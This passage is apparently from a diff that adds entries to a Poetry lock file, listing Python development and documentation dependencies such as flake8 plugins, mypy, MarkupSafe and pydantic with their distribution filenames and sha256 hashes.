"distlib-0.3.4-py2.py3-none-any.whl", hash = "sha256:6564fe0a8f51e734df6333d08b8b94d4ea8ee6b99b5ed50613f731fd4089f34b"}, + {file = "distlib-0.3.4.zip", hash = "sha256:e4b58818180336dc9c529bfb9a0b58728ffc09ad92027a3f30b7cd91e3458579"}, +] +docutils = [ + {file = "docutils-0.17.1-py2.py3-none-any.whl", hash = "sha256:cf316c8370a737a022b72b56874f6602acf974a37a9fba42ec2876387549fc61"}, + {file = "docutils-0.17.1.tar.gz", hash = "sha256:686577d2e4c32380bb50cbb22f575ed742d58168cee37e99117a854bcd88f125"}, +] +dparse = [ + {file = "dparse-0.5.1-py3-none-any.whl", hash = "sha256:e953a25e44ebb60a5c6efc2add4420c177f1d8404509da88da9729202f306994"}, + {file = "dparse-0.5.1.tar.gz", hash = "sha256:a1b5f169102e1c894f9a7d5ccf6f9402a836a5d24be80a986c7ce9eaed78f367"}, +] +filelock = [ + {file = "filelock-3.7.0-py3-none-any.whl", hash = "sha256:c7b5fdb219b398a5b28c8e4c1893ef5f98ece6a38c6ab2c22e26ec161556fed6"}, + {file = "filelock-3.7.0.tar.gz", hash = "sha256:b795f1b42a61bbf8ec7113c341dad679d772567b936fbd1bf43c9a238e673e20"}, +] +flake8 = [ + {file = "flake8-4.0.1-py2.py3-none-any.whl", hash = "sha256:479b1304f72536a55948cb40a32dce8bb0ffe3501e26eaf292c7e60eb5e0428d"}, + {file = "flake8-4.0.1.tar.gz", hash = "sha256:806e034dda44114815e23c16ef92f95c91e4c71100ff52813adf7132a6ad870d"}, +] +flake8-bandit = [ + {file = "flake8_bandit-2.1.2.tar.gz", hash = "sha256:687fc8da2e4a239b206af2e54a90093572a60d0954f3054e23690739b0b0de3b"}, +] +flake8-bugbear = [ + {file = "flake8-bugbear-21.11.29.tar.gz", hash = "sha256:8b04cb2fafc6a78e1a9d873bd3988e4282f7959bb6b0d7c1ae648ec09b937a7b"}, + {file = "flake8_bugbear-21.11.29-py36.py37.py38-none-any.whl", hash = "sha256:179e41ddae5de5e3c20d1f61736feeb234e70958fbb56ab3c28a67739c8e9a82"}, +] +flake8-docstrings = [ + {file = "flake8-docstrings-1.6.0.tar.gz", hash = "sha256:9fe7c6a306064af8e62a055c2f61e9eb1da55f84bb39caef2b84ce53708ac34b"}, + {file = "flake8_docstrings-1.6.0-py2.py3-none-any.whl", hash = "sha256:99cac583d6c7e32dd28bbfbef120a7c0d1b6dde4adb5a9fd441c4227a6534bde"}, +] +flake8-polyfill = [ + {file = "flake8-polyfill-1.0.2.tar.gz", hash = "sha256:e44b087597f6da52ec6393a709e7108b2905317d0c0b744cdca6208e670d8eda"}, + {file = "flake8_polyfill-1.0.2-py2.py3-none-any.whl", hash = "sha256:12be6a34ee3ab795b19ca73505e7b55826d5f6ad7230d31b18e106400169b9e9"}, +] +flake8-rst-docstrings = [ + {file = "flake8-rst-docstrings-0.2.5.tar.gz", hash = "sha256:4fe93f997dea45d9d3c8bd220f12f0b6c359948fb943b5b48021a3f927edd816"}, + {file = "flake8_rst_docstrings-0.2.5-py3-none-any.whl", hash = "sha256:b99d9041b769b857efe45a448dc8c71b1bb311f9cacbdac5de82f96498105082"}, +] +furo = [ + {file = "furo-2022.4.7-py3-none-any.whl", hash = "sha256:7f3e3d2fb977483590f8ecb2c2cd511bd82661b79c18efb24de9558bc9cdf2d7"}, + {file = "furo-2022.4.7.tar.gz", hash = "sha256:96204ab7cd047e4b6c523996e0279c4c629a8fc31f4f109b2efd470c17f49c80"}, +] +gitdb = [ + {file = "gitdb-4.0.9-py3-none-any.whl", hash = "sha256:8033ad4e853066ba6ca92050b9df2f89301b8fc8bf7e9324d412a63f8bf1a8fd"}, + {file = "gitdb-4.0.9.tar.gz", hash = "sha256:bac2fd45c0a1c9cf619e63a90d62bdc63892ef92387424b855792a6cabe789aa"}, +] +gitpython = [ + {file = "GitPython-3.1.27-py3-none-any.whl", hash = "sha256:5b68b000463593e05ff2b261acff0ff0972df8ab1b70d3cdbd41b546c8b8fc3d"}, + {file = "GitPython-3.1.27.tar.gz", hash = "sha256:1c885ce809e8ba2d88a29befeb385fcea06338d3640712b59ca623c220bb5704"}, +] +googletrans = [ + {file = "googletrans-3.0.0.tar.gz", hash = "sha256:44caeea42d91ff6ead5c2d49db2b88de66c45c2fe874c8ec03eb9b4ceb3a533d"}, +] +h11 = [ + {file = "h11-0.9.0-py2.py3-none-any.whl", hash = "sha256:4bc6d6a1238b7615b266ada57e0618568066f57dd6fa967d1290ec9309b2f2f1"}, + {file = "h11-0.9.0.tar.gz", hash = "sha256:33d4bca7be0fa039f4e84d50ab00531047e53d6ee8ffbc83501ea602c169cae1"}, +] +h2 = [ + {file = "h2-3.2.0-py2.py3-none-any.whl", hash = "sha256:61e0f6601fa709f35cdb730863b4e5ec7ad449792add80d1410d4174ed139af5"}, + {file = "h2-3.2.0.tar.gz", hash = "sha256:875f41ebd6f2c44781259005b157faed1a5031df3ae5aa7bcb4628a6c0782f14"}, +] +hpack = [ + {file = "hpack-3.0.0-py2.py3-none-any.whl", hash = "sha256:0edd79eda27a53ba5be2dfabf3b15780928a0dff6eb0c60a3d6767720e970c89"}, + {file = "hpack-3.0.0.tar.gz", hash = "sha256:8eec9c1f4bfae3408a3f30500261f7e6a65912dc138526ea054f9ad98892e9d2"}, +] +hstspreload = [ + {file = "hstspreload-2021.12.1-py3-none-any.whl", hash = "sha256:e8f03aac620d1947d66e311b706b46cc24a36792b346db7b483f148360843921"}, + {file = "hstspreload-2021.12.1.tar.gz", hash = "sha256:d9cd749fbb6ff6ca1a8945c4a48cb6f33d2f6d066cb5f9752a8b64a134ed5260"}, +] +httpcore = [ + {file = "httpcore-0.9.1-py3-none-any.whl", hash = "sha256:9850fe97a166a794d7e920590d5ec49a05488884c9fc8b5dba8561effab0c2a0"}, + {file = "httpcore-0.9.1.tar.gz", hash = "sha256:ecc5949310d9dae4de64648a4ce529f86df1f232ce23dcfefe737c24d21dfbe9"}, +] +httpx = [ + {file = "httpx-0.13.3-py3-none-any.whl", hash = "sha256:32d930858eab677bc29a742aaa4f096de259f1c78c68a90ad11f5c3c04f08335"}, + {file = "httpx-0.13.3.tar.gz", hash = "sha256:3642bd13e90b80ba8a243a730275eb10a4c26ec96f5fc16b87e458d4ab21efae"}, +] +hyperframe = [ + {file = "hyperframe-5.2.0-py2.py3-none-any.whl", hash = "sha256:5187962cb16dcc078f23cb5a4b110098d546c3f41ff2d4038a9896893bbd0b40"}, + {file = "hyperframe-5.2.0.tar.gz", hash = "sha256:a9f5c17f2cc3c719b917c4f33ed1c61bd1f8dfac4b1bd23b7c80b3400971b41f"}, +] +identify = [ + {file = "identify-2.5.1-py2.py3-none-any.whl", hash = "sha256:0dca2ea3e4381c435ef9c33ba100a78a9b40c0bab11189c7cf121f75815efeaa"}, + {file = "identify-2.5.1.tar.gz", hash = "sha256:3d11b16f3fe19f52039fb7e39c9c884b21cb1b586988114fbe42671f03de3e82"}, +] +idna = [ + {file = "idna-2.10-py2.py3-none-any.whl", hash = "sha256:b97d804b1e9b523befed77c48dacec60e6dcb0b5391d57af6a65a312a90648c0"}, + {file = "idna-2.10.tar.gz", hash = "sha256:b307872f855b18632ce0c21c5e45be78c0ea7ae4c15c828c20788b26921eb3f6"}, +] +imagesize = [ + {file = "imagesize-1.3.0-py2.py3-none-any.whl", hash = "sha256:1db2f82529e53c3e929e8926a1fa9235aa82d0bd0c580359c67ec31b2fddaa8c"}, + {file = "imagesize-1.3.0.tar.gz", hash = "sha256:cd1750d452385ca327479d45b64d9c7729ecf0b3969a58148298c77092261f9d"}, +] +importlib-metadata = [ + {file = "importlib_metadata-3.7.3-py3-none-any.whl", hash = "sha256:b74159469b464a99cb8cc3e21973e4d96e05d3024d337313fedb618a6e86e6f4"}, + {file = "importlib_metadata-3.7.3.tar.gz", hash = "sha256:742add720a20d0467df2f444ae41704000f50e1234f46174b51f9c6031a1bd71"}, +] +iniconfig = [ + {file = "iniconfig-1.1.1-py2.py3-none-any.whl", hash = "sha256:011e24c64b7f47f6ebd835bb12a743f2fbe9a26d4cecaa7f53bc4f35ee9da8b3"}, + {file = "iniconfig-1.1.1.tar.gz", hash = "sha256:bc3af051d7d14b2ee5ef9969666def0cd1a000e121eaea580d4a313df4b37f32"}, +] +jinja2 = [ + {file = "Jinja2-3.1.2-py3-none-any.whl", hash = "sha256:6088930bfe239f0e6710546ab9c19c9ef35e29792895fed6e6e31a023a182a61"}, + {file = "Jinja2-3.1.2.tar.gz", hash = "sha256:31351a702a408a9e7595a8fc6150fc3f43bb6bf7e319770cbc0db9df9437e852"}, +] +livereload = [ + {file = "livereload-2.6.3.tar.gz", hash = "sha256:776f2f865e59fde56490a56bcc6773b6917366bce0c267c60ee8aaf1a0959869"}, +] +markdown = [ + {file = "Markdown-3.3.5-py3-none-any.whl", hash = "sha256:0d2d09f75cb8d1ffc6770c65c61770b23a61708101f47bda416a002a0edbc480"}, + {file = "Markdown-3.3.5.tar.gz", hash = "sha256:26e9546bfbcde5fcd072bd8f612c9c1b6e2677cb8aadbdf65206674f46dde069"}, +] +markupsafe = [ + {file = "MarkupSafe-2.1.1-cp310-cp310-macosx_10_9_universal2.whl", hash = "sha256:86b1f75c4e7c2ac2ccdaec2b9022845dbb81880ca318bb7a0a01fbf7813e3812"}, + {file = "MarkupSafe-2.1.1-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:f121a1420d4e173a5d96e47e9a0c0dcff965afdf1626d28de1460815f7c4ee7a"}, + {file = "MarkupSafe-2.1.1-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:a49907dd8420c5685cfa064a1335b6754b74541bbb3706c259c02ed65b644b3e"}, + {file = "MarkupSafe-2.1.1-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:10c1bfff05d95783da83491be968e8fe789263689c02724e0c691933c52994f5"}, + {file = "MarkupSafe-2.1.1-cp310-cp310-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:b7bd98b796e2b6553da7225aeb61f447f80a1ca64f41d83612e6139ca5213aa4"}, + {file = "MarkupSafe-2.1.1-cp310-cp310-musllinux_1_1_aarch64.whl", hash = "sha256:b09bf97215625a311f669476f44b8b318b075847b49316d3e28c08e41a7a573f"}, + {file = "MarkupSafe-2.1.1-cp310-cp310-musllinux_1_1_i686.whl", hash = "sha256:694deca8d702d5db21ec83983ce0bb4b26a578e71fbdbd4fdcd387daa90e4d5e"}, + {file = "MarkupSafe-2.1.1-cp310-cp310-musllinux_1_1_x86_64.whl", hash = "sha256:efc1913fd2ca4f334418481c7e595c00aad186563bbc1ec76067848c7ca0a933"}, + {file = "MarkupSafe-2.1.1-cp310-cp310-win32.whl", hash = "sha256:4a33dea2b688b3190ee12bd7cfa29d39c9ed176bda40bfa11099a3ce5d3a7ac6"}, + {file = "MarkupSafe-2.1.1-cp310-cp310-win_amd64.whl", hash = "sha256:dda30ba7e87fbbb7eab1ec9f58678558fd9a6b8b853530e176eabd064da81417"}, + {file = "MarkupSafe-2.1.1-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:671cd1187ed5e62818414afe79ed29da836dde67166a9fac6d435873c44fdd02"}, + {file = "MarkupSafe-2.1.1-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:3799351e2336dc91ea70b034983ee71cf2f9533cdff7c14c90ea126bfd95d65a"}, + {file = "MarkupSafe-2.1.1-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:e72591e9ecd94d7feb70c1cbd7be7b3ebea3f548870aa91e2732960fa4d57a37"}, + {file = "MarkupSafe-2.1.1-cp37-cp37m-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:6fbf47b5d3728c6aea2abb0589b5d30459e369baa772e0f37a0320185e87c980"}, + {file = "MarkupSafe-2.1.1-cp37-cp37m-musllinux_1_1_aarch64.whl", hash = "sha256:d5ee4f386140395a2c818d149221149c54849dfcfcb9f1debfe07a8b8bd63f9a"}, + {file = "MarkupSafe-2.1.1-cp37-cp37m-musllinux_1_1_i686.whl", hash = "sha256:bcb3ed405ed3222f9904899563d6fc492ff75cce56cba05e32eff40e6acbeaa3"}, + {file = "MarkupSafe-2.1.1-cp37-cp37m-musllinux_1_1_x86_64.whl", hash = "sha256:e1c0b87e09fa55a220f058d1d49d3fb8df88fbfab58558f1198e08c1e1de842a"}, + {file = "MarkupSafe-2.1.1-cp37-cp37m-win32.whl", hash = "sha256:8dc1c72a69aa7e082593c4a203dcf94ddb74bb5c8a731e4e1eb68d031e8498ff"}, + {file = "MarkupSafe-2.1.1-cp37-cp37m-win_amd64.whl", hash = "sha256:97a68e6ada378df82bc9f16b800ab77cbf4b2fada0081794318520138c088e4a"}, + {file = "MarkupSafe-2.1.1-cp38-cp38-macosx_10_9_universal2.whl", hash = "sha256:e8c843bbcda3a2f1e3c2ab25913c80a3c5376cd00c6e8c4a86a89a28c8dc5452"}, + {file = "MarkupSafe-2.1.1-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:0212a68688482dc52b2d45013df70d169f542b7394fc744c02a57374a4207003"}, + {file = "MarkupSafe-2.1.1-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:8e576a51ad59e4bfaac456023a78f6b5e6e7651dcd383bcc3e18d06f9b55d6d1"}, + {file = "MarkupSafe-2.1.1-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:4b9fe39a2ccc108a4accc2676e77da025ce383c108593d65cc909add5c3bd601"}, + {file = "MarkupSafe-2.1.1-cp38-cp38-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:96e37a3dc86e80bf81758c152fe66dbf60ed5eca3d26305edf01892257049925"}, + {file = "MarkupSafe-2.1.1-cp38-cp38-musllinux_1_1_aarch64.whl", hash = "sha256:6d0072fea50feec76a4c418096652f2c3238eaa014b2f94aeb1d56a66b41403f"}, + {file = "MarkupSafe-2.1.1-cp38-cp38-musllinux_1_1_i686.whl", hash = "sha256:089cf3dbf0cd6c100f02945abeb18484bd1ee57a079aefd52cffd17fba910b88"}, + {file = "MarkupSafe-2.1.1-cp38-cp38-musllinux_1_1_x86_64.whl", hash = "sha256:6a074d34ee7a5ce3effbc526b7083ec9731bb3cbf921bbe1d3005d4d2bdb3a63"}, + {file = "MarkupSafe-2.1.1-cp38-cp38-win32.whl", hash = "sha256:421be9fbf0ffe9ffd7a378aafebbf6f4602d564d34be190fc19a193232fd12b1"}, + {file = "MarkupSafe-2.1.1-cp38-cp38-win_amd64.whl", hash = "sha256:fc7b548b17d238737688817ab67deebb30e8073c95749d55538ed473130ec0c7"}, + {file = "MarkupSafe-2.1.1-cp39-cp39-macosx_10_9_universal2.whl", hash = "sha256:e04e26803c9c3851c931eac40c695602c6295b8d432cbe78609649ad9bd2da8a"}, + {file = "MarkupSafe-2.1.1-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:b87db4360013327109564f0e591bd2a3b318547bcef31b468a92ee504d07ae4f"}, + {file = "MarkupSafe-2.1.1-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:99a2a507ed3ac881b975a2976d59f38c19386d128e7a9a18b7df6fff1fd4c1d6"}, + {file = "MarkupSafe-2.1.1-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:56442863ed2b06d19c37f94d999035e15ee982988920e12a5b4ba29b62ad1f77"}, + {file = "MarkupSafe-2.1.1-cp39-cp39-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:3ce11ee3f23f79dbd06fb3d63e2f6af7b12db1d46932fe7bd8afa259a5996603"}, + {file = "MarkupSafe-2.1.1-cp39-cp39-musllinux_1_1_aarch64.whl", hash = "sha256:33b74d289bd2f5e527beadcaa3f401e0df0a89927c1559c8566c066fa4248ab7"}, + {file = "MarkupSafe-2.1.1-cp39-cp39-musllinux_1_1_i686.whl", hash = "sha256:43093fb83d8343aac0b1baa75516da6092f58f41200907ef92448ecab8825135"}, + {file = "MarkupSafe-2.1.1-cp39-cp39-musllinux_1_1_x86_64.whl", hash = "sha256:8e3dcf21f367459434c18e71b2a9532d96547aef8a871872a5bd69a715c15f96"}, + {file = "MarkupSafe-2.1.1-cp39-cp39-win32.whl", hash = "sha256:d4306c36ca495956b6d568d276ac11fdd9c30a36f1b6eb928070dc5360b22e1c"}, + {file = "MarkupSafe-2.1.1-cp39-cp39-win_amd64.whl", hash = "sha256:46d00d6cfecdde84d40e572d63735ef81423ad31184100411e6e3388d405e247"}, + {file = "MarkupSafe-2.1.1.tar.gz", hash = "sha256:7f91197cc9e48f989d12e4e6fbc46495c446636dfc81b9ccf50bb0ec74b91d4b"}, +] +mccabe = [ + {file = "mccabe-0.6.1-py2.py3-none-any.whl", hash = "sha256:ab8a6258860da4b6677da4bd2fe5dc2c659cff31b3ee4f7f5d64e79735b80d42"}, + {file = "mccabe-0.6.1.tar.gz", hash = "sha256:dd8d182285a0fe56bace7f45b5e7d1a6ebcbf524e8f3bd87eb0f125271b8831f"}, +] +mypy = [ + {file = "mypy-0.910-cp35-cp35m-macosx_10_9_x86_64.whl", hash = "sha256:a155d80ea6cee511a3694b108c4494a39f42de11ee4e61e72bc424c490e46457"}, + {file = "mypy-0.910-cp35-cp35m-manylinux1_x86_64.whl", hash = "sha256:b94e4b785e304a04ea0828759172a15add27088520dc7e49ceade7834275bedb"}, + {file = "mypy-0.910-cp35-cp35m-manylinux2010_x86_64.whl", hash = "sha256:088cd9c7904b4ad80bec811053272986611b84221835e079be5bcad029e79dd9"}, + {file = "mypy-0.910-cp35-cp35m-win_amd64.whl", hash = "sha256:adaeee09bfde366d2c13fe6093a7df5df83c9a2ba98638c7d76b010694db760e"}, + {file = "mypy-0.910-cp36-cp36m-macosx_10_9_x86_64.whl", hash = "sha256:ecd2c3fe726758037234c93df7e98deb257fd15c24c9180dacf1ef829da5f921"}, + {file = "mypy-0.910-cp36-cp36m-manylinux1_x86_64.whl", hash = "sha256:d9dd839eb0dc1bbe866a288ba3c1afc33a202015d2ad83b31e875b5905a079b6"}, + {file = "mypy-0.910-cp36-cp36m-manylinux2010_x86_64.whl", hash = "sha256:3e382b29f8e0ccf19a2df2b29a167591245df90c0b5a2542249873b5c1d78212"}, + {file = "mypy-0.910-cp36-cp36m-win_amd64.whl", hash = "sha256:53fd2eb27a8ee2892614370896956af2ff61254c275aaee4c230ae771cadd885"}, + {file = "mypy-0.910-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:b6fb13123aeef4a3abbcfd7e71773ff3ff1526a7d3dc538f3929a49b42be03f0"}, + {file = "mypy-0.910-cp37-cp37m-manylinux1_x86_64.whl", hash = "sha256:e4dab234478e3bd3ce83bac4193b2ecd9cf94e720ddd95ce69840273bf44f6de"}, + {file = "mypy-0.910-cp37-cp37m-manylinux2010_x86_64.whl", hash = "sha256:7df1ead20c81371ccd6091fa3e2878559b5c4d4caadaf1a484cf88d93ca06703"}, + {file = "mypy-0.910-cp37-cp37m-win_amd64.whl", hash = "sha256:0aadfb2d3935988ec3815952e44058a3100499f5be5b28c34ac9d79f002a4a9a"}, + {file = "mypy-0.910-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:ec4e0cd079db280b6bdabdc807047ff3e199f334050db5cbb91ba3e959a67504"}, + {file = "mypy-0.910-cp38-cp38-manylinux1_x86_64.whl", hash = "sha256:119bed3832d961f3a880787bf621634ba042cb8dc850a7429f643508eeac97b9"}, + {file = "mypy-0.910-cp38-cp38-manylinux2010_x86_64.whl", hash = "sha256:866c41f28cee548475f146aa4d39a51cf3b6a84246969f3759cb3e9c742fc072"}, + {file = "mypy-0.910-cp38-cp38-win_amd64.whl", hash = "sha256:ceb6e0a6e27fb364fb3853389607cf7eb3a126ad335790fa1e14ed02fba50811"}, + {file = "mypy-0.910-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:1a85e280d4d217150ce8cb1a6dddffd14e753a4e0c3cf90baabb32cefa41b59e"}, + {file = "mypy-0.910-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:42c266ced41b65ed40a282c575705325fa7991af370036d3f134518336636f5b"}, + {file = "mypy-0.910-cp39-cp39-manylinux1_x86_64.whl", hash = "sha256:3c4b8ca36877fc75339253721f69603a9c7fdb5d4d5a95a1a1b899d8b86a4de2"}, + {file = "mypy-0.910-cp39-cp39-manylinux2010_x86_64.whl", hash = "sha256:c0df2d30ed496a08de5daed2a9ea807d07c21ae0ab23acf541ab88c24b26ab97"}, + {file = "mypy-0.910-cp39-cp39-win_amd64.whl", hash = "sha256:c6c2602dffb74867498f86e6129fd52a2770c48b7cd3ece77ada4fa38f94eba8"}, + {file = "mypy-0.910-py3-none-any.whl", hash = "sha256:ef565033fa5a958e62796867b1df10c40263ea9ded87164d67572834e57a174d"}, + {file = "mypy-0.910.tar.gz", hash = "sha256:704098302473cb31a218f1775a873b376b30b4c18229421e9e9dc8916fd16150"}, +] +mypy-extensions = [ + {file = "mypy_extensions-0.4.3-py2.py3-none-any.whl", hash = "sha256:090fedd75945a69ae91ce1303b5824f428daf5a028d2f6ab8a299250a846f15d"}, + {file = "mypy_extensions-0.4.3.tar.gz", hash = "sha256:2d82818f5bb3e369420cb3c4060a7970edba416647068eb4c5343488a6c604a8"}, +] +nodeenv = [ + {file = "nodeenv-1.6.0-py2.py3-none-any.whl", hash = "sha256:621e6b7076565ddcacd2db0294c0381e01fd28945ab36bcf00f41c5daf63bef7"}, + {file = "nodeenv-1.6.0.tar.gz", hash = "sha256:3ef13ff90291ba2a4a7a4ff9a979b63ffdd00a464dbe04acf0ea6471517a4c2b"}, +] +packaging = [ + {file = "packaging-21.3-py3-none-any.whl", hash = "sha256:ef103e05f519cdc783ae24ea4e2e0f508a9c99b2d4969652eed6a2e1ea5bd522"}, + {file = "packaging-21.3.tar.gz", hash = "sha256:dd47c42927d89ab911e606518907cc2d3a1f38bbd026385970643f9c5b8ecfeb"}, +] +pathspec = [ + {file = "pathspec-0.9.0-py2.py3-none-any.whl", hash = "sha256:7d15c4ddb0b5c802d161efc417ec1a2558ea2653c2e8ad9c19098201dc1c993a"}, + {file = "pathspec-0.9.0.tar.gz", hash = "sha256:e564499435a2673d586f6b2130bb5b95f04a3ba06f81b8f895b651a3c76aabb1"}, +] +pbr = [ + {file = "pbr-5.9.0-py2.py3-none-any.whl", hash = "sha256:e547125940bcc052856ded43be8e101f63828c2d94239ffbe2b327ba3d5ccf0a"}, + {file = "pbr-5.9.0.tar.gz", hash = "sha256:e8dca2f4b43560edef58813969f52a56cef023146cbb8931626db80e6c1c4308"}, +] +pep8-naming = [ + {file = "pep8-naming-0.12.1.tar.gz", hash = "sha256:bb2455947757d162aa4cad55dba4ce029005cd1692f2899a21d51d8630ca7841"}, + {file = "pep8_naming-0.12.1-py2.py3-none-any.whl", hash = "sha256:4a8daeaeb33cfcde779309fc0c9c0a68a3bbe2ad8a8308b763c5068f86eb9f37"}, +] +platformdirs = [ + {file = "platformdirs-2.5.2-py3-none-any.whl", hash = "sha256:027d8e83a2d7de06bbac4e5ef7e023c02b863d7ea5d079477e722bb41ab25788"}, + {file = "platformdirs-2.5.2.tar.gz", hash = "sha256:58c8abb07dcb441e6ee4b11d8df0ac856038f944ab98b7be6b27b2a3c7feef19"}, +] +pluggy = [ + {file = "pluggy-1.0.0-py2.py3-none-any.whl", hash = "sha256:74134bbf457f031a36d68416e1509f34bd5ccc019f0bcc952c7b909d06b37bd3"}, + {file = "pluggy-1.0.0.tar.gz", hash = "sha256:4224373bacce55f955a878bf9cfa763c1e360858e330072059e10bad68531159"}, +] +pre-commit = [ + {file = "pre_commit-2.19.0-py2.py3-none-any.whl", hash = "sha256:10c62741aa5704faea2ad69cb550ca78082efe5697d6f04e5710c3c229afdd10"}, + {file = "pre_commit-2.19.0.tar.gz", hash = "sha256:4233a1e38621c87d9dda9808c6606d7e7ba0e087cd56d3fe03202a01d2919615"}, +] +pre-commit-hooks = [ + {file = "pre_commit_hooks-4.2.0-py2.py3-none-any.whl", hash = "sha256:b3a3066c5ecd5fdda9abdc932bd064bd21785ea041659676403e6fc5d964afed"}, + {file = "pre_commit_hooks-4.2.0.tar.gz", hash = "sha256:9726420c7a071e8cb233a066d36bc074b593a40f0b1b491d1b75aafa55390703"}, +] +py = [ + {file = "py-1.11.0-py2.py3-none-any.whl", hash = "sha256:607c53218732647dff4acdfcd50cb62615cedf612e72d1724fb1a0cc6405b378"}, + {file = "py-1.11.0.tar.gz", hash = "sha256:51c75c4126074b472f746a24399ad32f6053d1b34b68d2fa41e558e6f4a98719"}, +] +pycodestyle = [ + {file = "pycodestyle-2.8.0-py2.py3-none-any.whl", hash = "sha256:720f8b39dde8b293825e7ff02c475f3077124006db4f440dcbc9a20b76548a20"}, + {file = "pycodestyle-2.8.0.tar.gz", hash = "sha256:eddd5847ef438ea1c7870ca7eb78a9d47ce0cdb4851a5523949f2601d0cbbe7f"}, +] +pycparser = [ + {file = "pycparser-2.21-py2.py3-none-any.whl", hash = "sha256:8ee45429555515e1f6b185e78100aea234072576aa43ab53aefcae078162fca9"}, + {file = "pycparser-2.21.tar.gz", hash = "sha256:e644fdec12f7872f86c58ff790da456218b10f863970249516d60a5eaca77206"}, +] +pydantic = [ + {file = "pydantic-1.9.1-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:c8098a724c2784bf03e8070993f6d46aa2eeca031f8d8a048dff277703e6e193"}, + {file = "pydantic-1.9.1-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:c320c64dd876e45254bdd350f0179da737463eea41c43bacbee9d8c9d1021f11"}, + {file = "pydantic-1.9.1-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:18f3e912f9ad1bdec27fb06b8198a2ccc32f201e24174cec1b3424dda605a310"}, + {file = "pydantic-1.9.1-cp310-cp310-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:c11951b404e08b01b151222a1cb1a9f0a860a8153ce8334149ab9199cd198131"}, + {file = "pydantic-1.9.1-cp310-cp310-musllinux_1_1_i686.whl", hash = "sha256:8bc541a405423ce0e51c19f637050acdbdf8feca34150e0d17f675e72d119580"}, + {file = "pydantic-1.9.1-cp310-cp310-musllinux_1_1_x86_64.whl", hash = "sha256:e565a785233c2d03724c4dc55464559639b1ba9ecf091288dd47ad9c629433bd"}, + {file = "pydantic-1.9.1-cp310-cp310-win_amd64.whl", hash = "sha256:a4a88dcd6ff8fd47c18b3a3709a89adb39a6373f4482e04c1b765045c7e282fd"}, + {file = "pydantic-1.9.1-cp36-cp36m-macosx_10_9_x86_64.whl", hash = "sha256:447d5521575f18e18240906beadc58551e97ec98142266e521c34968c76c8761"}, + {file = "pydantic-1.9.1-cp36-cp36m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:985ceb5d0a86fcaa61e45781e567a59baa0da292d5ed2e490d612d0de5796918"}, + {file = "pydantic-1.9.1-cp36-cp36m-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:059b6c1795170809103a1538255883e1983e5b831faea6558ef873d4955b4a74"}, + {file = "pydantic-1.9.1-cp36-cp36m-musllinux_1_1_i686.whl", hash = "sha256:d12f96b5b64bec3f43c8e82b4aab7599d0157f11c798c9f9c528a72b9e0b339a"}, + {file = "pydantic-1.9.1-cp36-cp36m-musllinux_1_1_x86_64.whl", hash = "sha256:ae72f8098acb368d877b210ebe02ba12585e77bd0db78ac04a1ee9b9f5dd2166"}, + {file = "pydantic-1.9.1-cp36-cp36m-win_amd64.whl", hash = "sha256:79b485767c13788ee314669008d01f9ef3bc05db9ea3298f6a50d3ef596a154b"}, + {file = "pydantic-1.9.1-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:494f7c8537f0c02b740c229af4cb47c0d39840b829ecdcfc93d91dcbb0779892"}, + {file = "pydantic-1.9.1-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:f0f047e11febe5c3198ed346b507e1d010330d56ad615a7e0a89fae604065a0e"}, + {file = "pydantic-1.9.1-cp37-cp37m-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:969dd06110cb780da01336b281f53e2e7eb3a482831df441fb65dd30403f4608"}, + {file = "pydantic-1.9.1-cp37-cp37m-musllinux_1_1_i686.whl", hash = "sha256:177071dfc0df6248fd22b43036f936cfe2508077a72af0933d0c1fa269b18537"}, + {file = "pydantic-1.9.1-cp37-cp37m-musllinux_1_1_x86_64.whl", hash = "sha256:9bcf8b6e011be08fb729d110f3e22e654a50f8a826b0575c7196616780683380"}, + {file = "pydantic-1.9.1-cp37-cp37m-win_amd64.whl", hash = "sha256:a955260d47f03df08acf45689bd163ed9df82c0e0124beb4251b1290fa7ae728"}, + {file = "pydantic-1.9.1-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:9ce157d979f742a915b75f792dbd6aa63b8eccaf46a1005ba03aa8a986bde34a"}, + {file = "pydantic-1.9.1-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:0bf07cab5b279859c253d26a9194a8906e6f4a210063b84b433cf90a569de0c1"}, + {file = 